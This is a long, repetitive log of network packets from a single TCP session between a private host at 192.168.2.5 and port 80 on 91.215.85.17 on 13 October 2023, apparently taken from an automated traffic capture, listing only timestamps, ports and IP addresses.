Oct 13, 2023 15:20:52.039288998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039448977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039503098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.039546013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039582968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039635897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.039694071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039804935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039840937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039856911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.039946079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039993048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040026903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040101051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040146112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040153980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040220976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040271044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040276051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040386915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040436983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040474892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040544033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040581942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040606976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040666103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040703058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040718079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040823936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040859938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040874004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040898085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.040947914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.040998936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041034937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041098118 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041100025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041136026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041169882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041187048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041271925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041317940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041338921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041415930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041464090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041500092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041563988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041610003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041649103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041723013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041770935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041802883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041857004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041901112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.041917086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.041958094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042009115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042046070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042098999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042149067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042185068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042237043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042283058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042299986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042378902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042427063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042459965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042542934 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042572021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042586088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042637110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042680979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042700052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042747974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042763948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042793036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042843103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042901039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.042931080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.042962074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043003082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043020964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043101072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043149948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043186903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043219090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043267012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043303013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043369055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043415070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043591022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043674946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043721914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043740034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043781042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043831110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043867111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043895960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.043939114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.043968916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044032097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044080973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044116020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044184923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044229031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044256926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044329882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044380903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044410944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044487000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044529915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044545889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044575930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044616938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044676065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044720888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044759035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044764996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044881105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044929028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.044955015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.044970989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045001030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045011997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045082092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045126915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045146942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045203924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045218945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045253038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045324087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045370102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045398951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045470953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045516968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045553923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045583010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045628071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045665979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045747042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045799017 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045834064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045881033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045929909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.045973063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.045989990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046035051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046080112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046147108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046191931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046216011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046298981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046345949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046385050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046473980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046521902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046560049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046628952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046672106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046679974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046760082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046804905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046837091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046884060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.046927929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.046935081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047032118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047074080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047101021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047173977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047219038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047241926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047307014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047353029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047385931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047425985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047487020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047502995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047575951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047621012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047650099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047692060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047738075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047763109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047818899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047863960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.047890902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047940016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047955990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.047983885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.048043013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.048080921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.048093081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.048130989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.048172951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.135488033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.135488033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386126041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386153936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386250019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386266947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386276007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386285067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386301994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386343956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386347055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386347055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386496067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386513948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386564016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386588097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386641026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386692047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386764050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386799097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386835098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386851072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386893988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.386924982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.386996031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387036085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387088060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387119055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387156010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387171984 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387253046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387290001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387337923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387355089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387386084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387398958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387454987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387490034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387541056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387556076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387593031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387610912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387628078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387742996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387778997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387797117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387814999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387829065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387882948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387917995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387953043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.387972116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.387999058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388051033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388149023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388236046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388278961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388294935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388328075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388390064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388468981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388504982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388561964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388619900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388657093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388670921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388755083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388791084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388866901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388874054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388911009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.388931036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.388978958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389126062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389163017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389179945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.389209032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.389425039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389486074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389576912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389615059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.389633894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.389662981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.390669107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.487173080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487215042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487339973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487374067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487394094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.487473965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487512112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487544060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.487576962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.487606049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487651110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487832069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487903118 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.487915993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487955093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.487972021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488078117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488115072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488173962 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488194942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488230944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488246918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488267899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488305092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488353968 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488404989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488442898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488462925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488607883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488645077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488686085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488702059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488744974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.488775015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488845110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488909960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488959074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.488966942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489011049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489020109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489094019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489161968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489221096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489310026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489363909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489372969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489449978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489578962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489638090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489674091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489732027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.489788055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.489862919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.490005016 CEST	80	49721	91.215.85.17	192.168.2.5
